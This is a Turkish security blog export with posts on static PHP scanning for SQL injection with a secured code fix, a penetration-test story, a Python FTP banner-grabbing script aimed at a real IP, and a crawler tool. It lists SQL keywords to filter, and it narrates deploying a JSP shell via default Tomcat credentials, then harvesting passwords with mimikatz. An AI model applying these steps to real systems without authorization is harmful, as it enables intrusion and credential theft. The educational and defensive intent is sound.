Script üzerinde manuel yöntemle SQL Injection zafiyetini keşfetmiştik, şimdi de otomatik olarak <b>RIPS</b> yazılımı aracılığıyla PHP scriptler üzerinde zafiyet araştırması yapalım. Bu arada RIPS; PHP için statik kodlarda zafiyet analizi yapan bir yazılımdır.<br />
<h4>
RIPS Kurulumu ve Kullanımı</h4>
RIPS hiç bir kurulum gerektirmez! Tak-Çalıştır mantığı :)<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
Öncelikle RIPS'i <b><a href="http://sourceforge.net/projects/rips-scanner/files/latest/download" rel="nofollow" target="_blank">buradan</a></b> indirelim. <b>rips</b> klasörünü localhost'unuza kopyalayın ve web tarayıcınızla ilgili URL'e gidin:<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1H-HGkK9W9txHrI5_YImNq09ambUTzyx2g110xgN8_nRfpcAeMmIe8tv19JPdQj2kTYA7e494Q3nZUBztJht_qR_nNreiZ03oFAqg9dms34zu2mggf7CV4kGe8pxIFEPSJ02QIehO0UZY/s1600/sqli-researching6.1.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="324" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1H-HGkK9W9txHrI5_YImNq09ambUTzyx2g110xgN8_nRfpcAeMmIe8tv19JPdQj2kTYA7e494Q3nZUBztJht_qR_nNreiZ03oFAqg9dms34zu2mggf7CV4kGe8pxIFEPSJ02QIehO0UZY/s1600/sqli-researching6.1.png" width="640" /></a><br />
<br />
<i>1. Adımda:</i> Taramak istediğiniz PHP scriptin klasör yolu belirtilir. Ben yukarıda örneğini yaptığımız betiğin klasör yolunu yazdım, çünkü şuan onu tarayacağız.<br />
<br />
<i>2. Adımda:</i> Zafiyet tipi seçilir. Ben SQL Injection zafiyetini seçtim.<br />
<br />
<i>3. Adımda:</i> subdirs'i seçersek belirttiğiniz klasör yolunun alt klasörleri de taranacaktır.<br />
<br />
<i>4. Adımda:</i> Son olarak scan butonuna basarak taramayı başlatıyoruz.<br />
<br />
Ben taramamı yaptım ve sonuç bu şekilde:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFP6mb77GwU3ZROFGQUoCaO_zl1wNDFB4efF6WMw01r65kg6tJt1YGsAXYt0C_fS_ftDsdpqLa3vStYbX7japGo03LauHQqfvWX0YEuo6DrCEFnLlAbK_7j8Pg5T5PUuc7MjY6kOP9HG7n/s1600/sqli-researching7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFP6mb77GwU3ZROFGQUoCaO_zl1wNDFB4efF6WMw01r65kg6tJt1YGsAXYt0C_fS_ftDsdpqLa3vStYbX7japGo03LauHQqfvWX0YEuo6DrCEFnLlAbK_7j8Pg5T5PUuc7MjY6kOP9HG7n/s1600/sqli-researching7.png" width="640" /></a></div>
<br />
Görüldüğü üzere RIPS, 7. satırda SQL Injection zafiyeti tespit etti. Yukarıda biz manuel denetim yaparken keşfettik hatırladınız mı? :)<br />
<br />
<b><span style="color: blue;">Hocam zayıf kodu paylaştınız, peki bu kodun güvenli hali nasıl yazılır?</span></b><br />
<b>Güvenli Kod 1:</b><br />
<blockquote class="tr_bq">
<?php<br />
<br />
$baglan = mysql_pconnect("localhost","root","123456");<br />
$baglan = mysql_select_db("sqli",$baglan); </blockquote>
<blockquote class="tr_bq">
<b><span style="color: red;">$id = (int) intval($_GET["id"]);</span></b><span class="Apple-tab-span" style="white-space: pre;"> </span><b>// değişken tipi belirlenerek integer koruması sağlandı</b><br />
$sorgu = "SELECT * FROM uye WHERE id=".$id;<br />
$cek = mysql_fetch_object(mysql_query($sorgu)); </blockquote>
<blockquote class="tr_bq">
echo 'Olusan Sorgu: '.$sorgu."<br>";<br />
echo $cek->username."<br>".$cek->email;<br />
<br />
?></blockquote>
<b>id</b> değişkeninin tipini belirleyerek integer koruması sağlamış olduk. Yani saldırgan <i>http://localhost/sqli/uye.php?id=1</i> URL'inden sonra tek tırnak meta-karakterini eklediğinde amacına ulaşamayacaktır çünkü<b> id=</b> query'sinden sonra sadece integer değerler kabul edilecektir. String yani karakter dizileri kabul edilemeyecektir.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwffgd3UhIjPQTnuT2PtZxonsbOUrPTjtTZGqhMkyZUOgM7mUmeMk6cwpajTtwLyVNnPWRf3HLuADpXkbiThyphenhyphenD2dkklc6iB2zoZJqmv0rDC8_JG4pG6bN87LQr-k8rRvSfn3Z__FW5fAx4/s1600/sqli-researching8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwffgd3UhIjPQTnuT2PtZxonsbOUrPTjtTZGqhMkyZUOgM7mUmeMk6cwpajTtwLyVNnPWRf3HLuADpXkbiThyphenhyphenD2dkklc6iB2zoZJqmv0rDC8_JG4pG6bN87LQr-k8rRvSfn3Z__FW5fAx4/s1600/sqli-researching8.png" width="640" /></a></div>
Gördüğünüz gibi kullanıcı adı ve parolayı veritabanından çekemiyoruz :(<br />
<br />
SQL Injection'dan korunma tabi ki sadece bununla sınırlı değildir.. Örneğin id değişkeni <i>mysql_real_escape_string</i> fonksiyonu içine alınarak SQL sorguları için zararlı olabilecek karakterlerin başına <b><span style="color: red;">\</span></b> ekler.<br />
<h4>
Diğer <span style="color: red;">SQL Injection'dan Korunma Yöntemleri</span></h4>
<ul>
<li>Web uygulamalarında SQL Injection saldırısı yapmakta kullanılan komut ve karakterlerin geçişi engellenmelidir. Veri girişinin filtrelenmesi kadar veri çıkışının da incelenmesi web uygulamanın güvenliğini arttıracaktır.</li>
<li>Aşağıda belirtilen karakterlerin filtrelenmesi web uygulamanın SQL Injection ve olası diğer saldırılara karşı güvenliğini sağlayacaktır:</li>
<ul>
<li><b>['],[<],[>],[;],[/],[?],[=],[&],[#],[%],[{],[}],[|],[@],[\],[union],[exec],[select],[insert], [update],[delete],[drop],[sp],[xp],["]</b></li>
</ul>
<li>Veritabanı Bağlantılarının Yetkilerinin Düşürülmesi</li>
<ul>
<li>Web uygulamanın veritabanına bağlanıp kayıtları okurken ve yazarken kullandığı hesabın yetkilerinin minimumda tutulması olası SQL Injection saldırısının zararlarını azaltacaktır.</li>
</ul>
<li>Hata Mesajlarının Engellenmesi</li>
<ul>
<li>Saldırganların hata mesajlarından bilgi almasını engellemek için hata mesajlarının görüntülenmesini engellemek sistemi daha güvenli hale getirecektir.</li>
</ul>
<li>SA Hesabının Korunması</li>
<ul>
<li>MS SQL sunucu üzerinde bulunan SA hesabının güçlü bir parolaya sahip olması brute-force saldırına karşı sistemin güvenliğini arttırmak için gerekli etkenlerden biridir. Web uygulamalarının SA hesabı ile veritabanına bağlanmasını engellemeliyiz! Olası SQL Injection sonucu saldırganın SA yetkilerinde kod çalıştırabileceğini unutmayınız.</li>
</ul>
<li>Kaynak Kodların Kontrol Edilmesi</li>
<ul>
<li>Web uygulamalarının kaynak kodlarının olası saldırılara karşı denetlenmesi gerekmektedir. Özellikle kullanıcının veri girişine müsade edilen alanlar ve URL alanında yapılabilecek değişikliklere karşı filtrelemelerin uygulanmasını sağlamalıyız.</li>
</ul>
<li>Veritabanındaki Kayıtların Şifrelenmesi</li>
<ul>
<li>Özellikle kullanıcıların parolalarının tutulduğu alanların şifrelenerek veritabanına yazılması olası veritabanındaki bilgilere ulaşılması durumuna karşı ekstra güvenlik sağlayacaktır.</li>
</ul>
<li>Yazılımsal veya donanımsal olarak Web Application Firewall (WAF) kullanımı</li>
</ul>
<br />
Pekiştirmek açısından bir örnek daha yapmak istiyorum.<br />
PHP script olan TopGames v1.2 sürümünde daha önceden SQL Injection açığı keşfedilmiş (http://www.exploit-db.com/exploits/26405/).<br />
<br />
Haydi bunun sağlamasını RIPS ile tarayarak yapalım.. sonuç ortada:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBL1q0m9-joRzRgHsPvn0X9fF0D_5R_fw1pP1S52_XPnzxTEMSBpXdbmQCEeDv2ZgJOqz1W_AVK3kxWtdOxML9Rtswkun2scZyN4cze_sUNTDzFVOEHY-Jc86rEKHXxGJLopp-UjOOl6Wn/s1600/sqli-researching9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="402" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBL1q0m9-joRzRgHsPvn0X9fF0D_5R_fw1pP1S52_XPnzxTEMSBpXdbmQCEeDv2ZgJOqz1W_AVK3kxWtdOxML9Rtswkun2scZyN4cze_sUNTDzFVOEHY-Jc86rEKHXxGJLopp-UjOOl6Wn/s1600/sqli-researching9.png" width="640" /></a></div>
<br />
SQL Injection dışında bir de Cross-Site Scripting (XSS) zafiyeti keşfettik :)<br />
<br />
play.php dosyasının 4. satırında SQL Injection zafiyeti (<b>$_GET["<span style="color: red;">gid</span>"]</b>) ve cat.php dosyasının 4. satırında (<b>$_GET["<span style="color: red;">id</span>"]</b>) XSS zafiyeti mevcutmuş.<br />
<br />
SQL Injection zafiyetini bu seferde <b>Havij</b> ile exploit edelim:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZYK-a6OkZT5LKPu-8TG855Lo7njj1xhplLOwhg7Wykf_BE4u1z-lGb6kCBsEbsUpZFO62TP59_3QW8gLd7V-xaSeyJyykyhUD-tJCSCt0LjAqgNs4PFZ_ar3ydD8yBkkyZkaIuXR5OOpn/s1600/sqli-researching10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZYK-a6OkZT5LKPu-8TG855Lo7njj1xhplLOwhg7Wykf_BE4u1z-lGb6kCBsEbsUpZFO62TP59_3QW8gLd7V-xaSeyJyykyhUD-tJCSCt0LjAqgNs4PFZ_ar3ydD8yBkkyZkaIuXR5OOpn/s1600/sqli-researching10.png" width="588" /></a></div>
<br />
Bir de bulduğumuz XSS zafiyetini test edelim:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmIDZDyJ_icO3TO_onFX5ouENIv3A5p3TjcBfu6Kv1C_lRWN97YUqmE_1TfLDFLBZR9VQUal7tKDvJ-vK2h8bAvL5oOvg34vPBbQFawQNvMzyk4oSsu7JWxIW3YLTqY2Z-HT8lfVHf94wE/s1600/sqli-researching11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmIDZDyJ_icO3TO_onFX5ouENIv3A5p3TjcBfu6Kv1C_lRWN97YUqmE_1TfLDFLBZR9VQUal7tKDvJ-vK2h8bAvL5oOvg34vPBbQFawQNvMzyk4oSsu7JWxIW3YLTqY2Z-HT8lfVHf94wE/s1600/sqli-researching11.png" width="640" /></a></div>
<br />
Sonuç başarılı...<br />
<br />
TopGames scriptinde bulduğumuz XSS zafiyetini Exploit-DB'ye mi bildirsek ne? :)<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpiF2KsYqDjWP93fsFcBiDXU0tLQqJ_rlS0tgrqkUOo6DtR4uB3DEhcK7MGsRx35CINTc40gQ0wBFERol_3OX1JpOPzWp95G7R2WEt4hRah8m3eEbGwMQ7hlq6JNh3QmHpogXN_0H7Tp8k/s1600/sqli-researching2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><br /></a>İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com12tag:blogger.com,1999:blog-925370819781376022.post-89806261646967128932014-04-03T14:45:00.002+03:002022-12-19T15:04:52.413+03:00Bir Pentest Hikayesi<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnwWoFdT5DzQPOwfr8TTHTjbrKJxkrY2b3iLG9DsNuFe6IZnQ-63a29MGFuMqeBUytJYST9S63M-xpKiVxHY2d2Vw1cijV2qK2h8uxYWi0wtwWbISit79y3GLt9P7EWpdZc8H3XWhU3nj8/s1600/PenTest_Image.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnwWoFdT5DzQPOwfr8TTHTjbrKJxkrY2b3iLG9DsNuFe6IZnQ-63a29MGFuMqeBUytJYST9S63M-xpKiVxHY2d2Vw1cijV2qK2h8uxYWi0wtwWbISit79y3GLt9P7EWpdZc8H3XWhU3nj8/s1600/PenTest_Image.png" width="200" /></a></div>
Bu sefer teknik olmayan bir konuyla karşınızdayım. Başlıktan da anlaşıldığı gibi sizlere hikaye anlatacağım :)<br />
Gerçekleştirmiş olduğum(uz) penetrasyon testlerinde karşılaştığımız problemleri, çözümleri, tecrübe edindiğimiz konuları, komik olayları vs.. anlatan ama detaylarında yeni başlayan arkadaşlar için faydalı olabilecek bir yazı dizisi planlamaktayım. <br />
<br /><br /><br />
Sabahın 05:00 sularında uyandırıldım. Uyku sersemliğiyle telefonda anladığım kadarıyla sektöründe Türkiye'nin önemli firmalarından birinin terminal sunucusu ransomware saldırısına uğramış. Hemen hazırlandım ve yola çıktım. Diğer ekip arkadaşlarımda saldırıya maruz kalan firmaya doğru yol aldılar.<br />
<br />
Firmaya vardığımızda tahmin ettiğimiz şekilde sunucuya bir text dosyası bırakılmış ve ilgili firmanın verilerini encrypt ettiğini ve encrypt edilen verilerin açılması için fidye istenmekteydi.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivfj94WJ7gflAcD0ZRRO6-wpWU_HwyWcbiftPdh-bvdhNcOTm2t6jROHQt7MNNtkVheU57LHsDwoO3ctEKU9Muau8rQJlpdQt9ZGOyH20iU2C9yev2kqUfG_SCUrVCtOAu8oSvBVUCN1wA/s1600/ransomware.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivfj94WJ7gflAcD0ZRRO6-wpWU_HwyWcbiftPdh-bvdhNcOTm2t6jROHQt7MNNtkVheU57LHsDwoO3ctEKU9Muau8rQJlpdQt9ZGOyH20iU2C9yev2kqUfG_SCUrVCtOAu8oSvBVUCN1wA/s1600/ransomware.jpg" width="640" /></a></div>
<br />
Birkaç saat boyunca çeşitli yöntemlerle (firewall logları ve ilgili/şüpheli makineler üzerinde windows logları, son çalıştırılan dosyalar, şüpheli dosyalar, sistem başlangıcı, regedit, çalışan servisler, portların taranması, dinlenen portların tespiti vs..) saldırıya dair izleri araştırdık.<br /><br />Bu analiz süreci devam ederken IT sorumlusuna enfekte olmuş sunucunun Local Administrator parolasının ne olduğunu sordum. Ve tahmin ettiğim yanıt hiç gecikmeden geldi: <b>123456 </b>:)<br />
<i>Bu tip hacking saldırıları genellikle; zayıf parola kullanımıyla beraber dışarıya açık olan uzak masaüstü servisi (RDP) ve MSSQL servisi, eski işletim sistemi zafiyetleri, mail yoluyla gönderilen fatura vb. gibi görünen zararlı dosyaların kullanıcının sisteme bulaştırılmasıyla böyle sonuçlara zemin oluşturmaktadır.</i><br />
<br />
Firma çok şanslıydı.. Logları incelememiz sonucunda bu olayın başlangıç zamanından tam 1 dakika önce şirketimizin sistem çözümleri departmanında çalışan arkadaşımız tarafından farklı bağımsız bir lokasyona yedek alınmıştı. Bu yüzden verilerin kurtarılmasıyla uğraşmamıştık direkt olarak çözüm odaklı davrandık çünkü business continuity (iş sürekliliği) önemlidir. Aynı veya benzer pozisyondan gol yiyebilirsiniz. Bu yüzden olayın kaynağı tespit etmek, saldırı yüzeyini analiz etmek ve gedikleri tıkamak gerekir.<div>Bu arada siber olay müdahale çerçevesinde yapılan analizler neticesinde bu ransomware vakasından tek bir sunucu etkilenmişti ve tehdit aktörünün yerel ağda başka sunuculara karşı yatay yayılım yapmadığı gözlemlendi.</div><div><br /></div><div>Çalışmalar sabahın erken saatlerinden gece saat 02:00'a kadar sürdü ve bu konuyu başarılı bir şekilde sonlandırmış olduk. Tabi müşterimizin artık siber güvenlik hususunda farkındalığı vardı ve bu konuda yapılması gerekenleri bütçeleri dahilinde hızlıca gerçekleştirmeye karar verdiler. Müşteri siber güvenlik durum ve ihtiyaç analizi yapıldı, bir takım hizmet/ürün kalemi ortaya çıkmıştı, onlardan birisi de tabi ki pentest (penetrasyon testi/sızma testi) idi :)</div><div>
<br />
Pentest için anlaşılıp çalışma tarihi aldıktan sonra hazırlığımızı yapıp belirlenen tarihte firmaya gittik. Vakit kaybetmeden testlere başladık. Sırasıyla hibrit (otomatik ve manuel) bir şekilde önce sistemleri keşfetme-bilgi toplama, zafiyet taraması ve son olarak da tespit edilen bulgular özelinde exploiting işlemlerini yaptık. Ayrıca, sosyal mühendislik kapsamında phishing testi de yapılacaktı. Bunun için arama motorlarından elde ettiğimiz firma çalışanlarının mail adreslerine belirlediğimiz senaryo kapsamında zararlı yazılım (trojan) bulaştırılmaya çalışıldı. 21 kişiden 13 tanesi zararlı yazılımı açtı ve bilgisayarına bulaştırmıştı. Bu rakamlar çok tehlikeli..</div><div><br />
Testin son demleriydi, elde ettiğimiz bulguları toparlıyorduk. Ben son kez sunucuların bulunduğu IP bloğunda farklı metotlarla tekrar bir port taraması gerçekleştirdim ve önceden keşfedemediğimiz bir sunucu keşfettim. 8090 portunda Apache Tomcat koşuyordu. Hemen web browserden kontrol ettim. Default Apache Tomcat parolalarını denedim ve bir tanesi tuttu. Yönetim bölümünün Deploy kısmından örnek ekran görüntüsünde görüldüğü gibi içeriye komut çalıştırabileceğim basit bir JSP shell (cmd) import ettim:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB-BuxwhUlJqrS5oOphH58YSDGPxh4x_ruPLhKrssRo4r6REjkQSpg3TG-lL8Heu-7rlLihigr2SZvmpg37BXFxfpaKSJM60-HWLzMxlq9RI68zfJVITsOSWRK24iisgaiq5Gmts2fbtqE/s1600/apache-tomcat.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="307" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB-BuxwhUlJqrS5oOphH58YSDGPxh4x_ruPLhKrssRo4r6REjkQSpg3TG-lL8Heu-7rlLihigr2SZvmpg37BXFxfpaKSJM60-HWLzMxlq9RI68zfJVITsOSWRK24iisgaiq5Gmts2fbtqE/s1600/apache-tomcat.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv75b5gzwo6jcanjBivlDdS_mRQpWCpuljFBwlcb-oWWVmBcmv2N_SwsS05bKWrWl7aDJnR9LksZ4GUj3KWq9oOPjeWEcGdSFA7RfAV3ZujKBLCZDllvoHEP1GJUqSnhQNUFyIENEXXhJ5/s1600/java-shell.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv75b5gzwo6jcanjBivlDdS_mRQpWCpuljFBwlcb-oWWVmBcmv2N_SwsS05bKWrWl7aDJnR9LksZ4GUj3KWq9oOPjeWEcGdSFA7RfAV3ZujKBLCZDllvoHEP1GJUqSnhQNUFyIENEXXhJ5/s16000/java-shell.png" /></a></div>
Yüklenen "cmd" isimli shell ile Windows üzerinde SYSTEM yetkileriyle komutlar yürütebilecektik. Bu shell ile Windows için Administrator yetkilerine sahip bir kullanıcı hesabı oluşturuldu ve bu kullanıcı Remote Desktop User grubuna dahil edilerek işletim sistemine uzaktan bağlantı sağladık. Daha sonra bu işletim sisteminde daha önceden oturum açmış olan kullanıcıların şifrelerini/parolalarını <b>mimikatz</b> aracıyla ele geçirdik.<br />
Elde edilen bu şifreler/parolalar ile networkte bulunan diğer (SQL Server, SharePoint, Exchange vs..) sunuculara erişim sağlandı. Tüm sistem elimizin altındaydı. Son olarak Domain sunucusuna sızdığımızı IT müdürüne bildirdik. Müdür telaşla gelip "testi sonlandırın artık, tüm sistem deşifre oldu" demesiyle işte o zaman yüzümüzde tebessümler eksik olmuyordu.. :)</div>İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com4tag:blogger.com,1999:blog-925370819781376022.post-14843600676423810752014-03-14T16:42:00.000+02:002018-10-25T14:59:29.745+03:00Python ile Banner Grabbing MantığıGenellikle <b>Vulnerability Assessment</b> tarayıcılarının genel olarak çalışma mantığı; hedef sistemi tararken öncelikle port taramasıyla hedef sistemin açık veya filtreli portlarını keşfeder. Açık portlarda yer alan servis bilgisini (hizmet, software vb.) keşfettikten sonra tarayıcının kendi veritabanında bulunan güvenlik zafiyeti barındıran servis ismiyle karşılaştırır eğer eşleşiyor ise bu sistemde XYZ zafiyeti vardır demektedir...<br />
<br />
Tabi bu sadece <b>possible</b> yani <b>olabilir</b> demektir. Çünkü Vulnerability Assessment tarayıcıları keşfedilen zafiyeti sistemde gerçekten olup olmadığını doğrulamaz.<br />
Evet belki hedef sistemin bir portunda çalışan XYZ servisinde daha önceden <b>Security Reseacher</b>'ler tarafından keşfedilmiş bir zafiyet olabilir fakat hedef sistemde belki bu zafiyet fixlenmiştir (kapatılmıştır)? Veya serviste sorun vardır tam çalışmıyordur bile.. İşte bu saydığım ve bunun gibi tarayıcılardan tarafından keşfedilen zafiyetlerin durumuna <b>false-positive</b> demekteyiz.<br />
<br />
<i>False-Positive kavramını basitçe anlatan bir diyagram çizdim:</i><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGCUSYRxxrpI9Osjh-0Ij1FwIHbhDX6o6EzXYMTFbHfqMwbcJqymFY5t8EnSpp0evtirrtmBMGSHgF26P1wDtG3mAXhj6hqK_WeagI3OaZ8-Rem5OmQ6INJxUupQMDSakWKLgwRs7l91UQ/s1600/vulnerability-scanner.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGCUSYRxxrpI9Osjh-0Ij1FwIHbhDX6o6EzXYMTFbHfqMwbcJqymFY5t8EnSpp0evtirrtmBMGSHgF26P1wDtG3mAXhj6hqK_WeagI3OaZ8-Rem5OmQ6INJxUupQMDSakWKLgwRs7l91UQ/s1600/vulnerability-scanner.jpg" width="640" /></a></div>
<br />
Yukarıdaki belirttiğim konuya istinaden Vulnerability Assessment tarayıcıların temel çalışma mantığını Python'da socket modülünü kullanarak belirlenen hedef sisteme 21 FTP portundan bağlanıp önceden belirlediğimiz zafiyet barındıran FTP servislerinin karşı tarafta olup olmadığını eşleştiren küçük bir uygulama yapacağız.<br />
<br />
<a name='more'></a><b><i>1) Bağlantı kurarak banner (servis) bilgisi elde etme:</i></b><br />
<blockquote class="tr_bq">
import socket<br />
socket.setdefaulttimeout(2)<br />
s = socket.socket()<br />
s.connect(("80.243.179.140",21))<br />
banner = s.recv(2048)<br />
print "[+] Servis Bilgisi: "+banner</blockquote>
Çıktısı:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM-akheU2ND1fpx6w9elMgApIahJLAbQguKVgDzA8BCByuC4XnZDqTAFVnW-6j05Amul8YkE64SjReAQmYypWD-nsCI-vyonoN5Sk6bJok9I_ZdZNibHiGAhVMa1yqXlQxXZRBZCvmMi8x/s1600/bannergrab1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM-akheU2ND1fpx6w9elMgApIahJLAbQguKVgDzA8BCByuC4XnZDqTAFVnW-6j05Amul8YkE64SjReAQmYypWD-nsCI-vyonoN5Sk6bJok9I_ZdZNibHiGAhVMa1yqXlQxXZRBZCvmMi8x/s1600/bannergrab1.png" width="640" /></a></div>
<br />
<i><b>2) IF - ELIF - ELSE kullanarak zafiyet tespiti:</b></i><br />
<blockquote class="tr_bq">
import socket </blockquote>
<blockquote class="tr_bq">
socket.setdefaulttimeout(2)<br />
s = socket.socket()<br />
s.connect(("80.243.179.140",21))<br />
banner = s.recv(2048) </blockquote>
<blockquote class="tr_bq">
if ("FreeFloat Ftp Server (Version 1.00)" in banner):<br />
print "[+] FreeFloat FTP Server zafiyet barindirmaktadir."<br />
elif ("ProFTPD 1.3.4c Server" in banner):<br />
print "[+] ProFTPD Server zafiyet barindirmaktadir."<br />
elif ("Ability Server 2.34" in banner):<br />
print "[+] Ability FTP Server zafiyet barindirmaktadir."<br />
elif ("Sami FTP Server 2.0.2" in banner):<br />
print "[+] Sami FTP Server zafiyet barindirmaktadir."<br />
else:<br />
print "[-] FTP Server'inde zafiyet bulunamadi."</blockquote>
<div>
Çıktısı:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtRv8y7eQKl5yLjIrYQdbt8o0VpghZdp1KWS86z-wza1b2osQnrO9OcJQthUXkCZOyurq9lRf-9NVHs9mXHR2XzWt-v5NeyEm_rmBa-p4Urg15GvIPQyrev9Xaa4Jl66BqMOtwZMZwQeL8/s1600/bannergrab2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtRv8y7eQKl5yLjIrYQdbt8o0VpghZdp1KWS86z-wza1b2osQnrO9OcJQthUXkCZOyurq9lRf-9NVHs9mXHR2XzWt-v5NeyEm_rmBa-p4Urg15GvIPQyrev9Xaa4Jl66BqMOtwZMZwQeL8/s1600/bannergrab2.png" width="640" /></a></div>
<div>
<br /></div>
Faydalı olması dileğiyle...İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com2tag:blogger.com,1999:blog-925370819781376022.post-7573983579750160172014-03-12T10:13:00.001+02:002014-03-12T10:13:01.978+02:000x150 Web Crawler v2.1<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2pTD7cvSTRX0Roarbodjf6YG_G9YaBaBx7bygftcl5ICEFYZeXHHBIKuZsEyG5jIyXCmLpS16hshAf_3kWczfXoTmlwSMthF9S8LZg1mHXw2X65Q5jW1x2PgduUVy4jDGTn1lNpUrTD4f/s1600/web-crawler.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2pTD7cvSTRX0Roarbodjf6YG_G9YaBaBx7bygftcl5ICEFYZeXHHBIKuZsEyG5jIyXCmLpS16hshAf_3kWczfXoTmlwSMthF9S8LZg1mHXw2X65Q5jW1x2PgduUVy4jDGTn1lNpUrTD4f/s1600/web-crawler.jpg" height="200" width="178" /></a><br />
<div>
0x150 Web Crawler gün geçtikçe yeni özellikler katılarak güncelleştirilmektedir. <i><b>Umut Cem</b></i> geliştirmeye dahil olduktan sonra 2.1 versiyonundaki özellikler şunlardır:<br />
<br />
<ul>
<li>Görsellik açısından PyQt4 ile kodlanmıştır</li>
<li>Crawler robotu sayesinde hedef verilen web sitenin linklerini toplar</li>
<li>Reverse-IP tekniğiyle sunucuda barınan komşu siteleri tespit eder</li>
<li>Tespit ettiği her komşu site için link taraması yapar</li>
</ul>
</div>
<div>
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2pTD7cvSTRX0Roarbodjf6YG_G9YaBaBx7bygftcl5ICEFYZeXHHBIKuZsEyG5jIyXCmLpS16hshAf_3kWczfXoTmlwSMthF9S8LZg1mHXw2X65Q5jW1x2PgduUVy4jDGTn1lNpUrTD4f/s1600/web-crawler.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"></a><br />
<div>
Ekran Görüntüsü:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtgUhZVDDmidj3dL5zKEuQy60D38H3GJbL8ZKMud_tJe03sye3NbiqcmfkBz5P2niqEibzyZ7ckTYjAPLmK_T79B0A9TEgOR2vtWGaP_3Pou7UA0hPAE0fPj7NJAsNmt-f7xcH7TTHwG4L/s1600/0x150+v2.1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtgUhZVDDmidj3dL5zKEuQy60D38H3GJbL8ZKMud_tJe03sye3NbiqcmfkBz5P2niqEibzyZ7ckTYjAPLmK_T79B0A9TEgOR2vtWGaP_3Pou7UA0hPAE0fPj7NJAsNmt-f7xcH7TTHwG4L/s1600/0x150+v2.1.png" height="225" width="400" /></a></div>
<br /></div>
<div>
<br /></div>
<div>
<b><span style="color: red;">>></span> <a href="http://yadi.sk/d/e1cCF4fIKNYQm" target="_blank">Programı indirmek için tıklayınız</a></b><br />
<br />
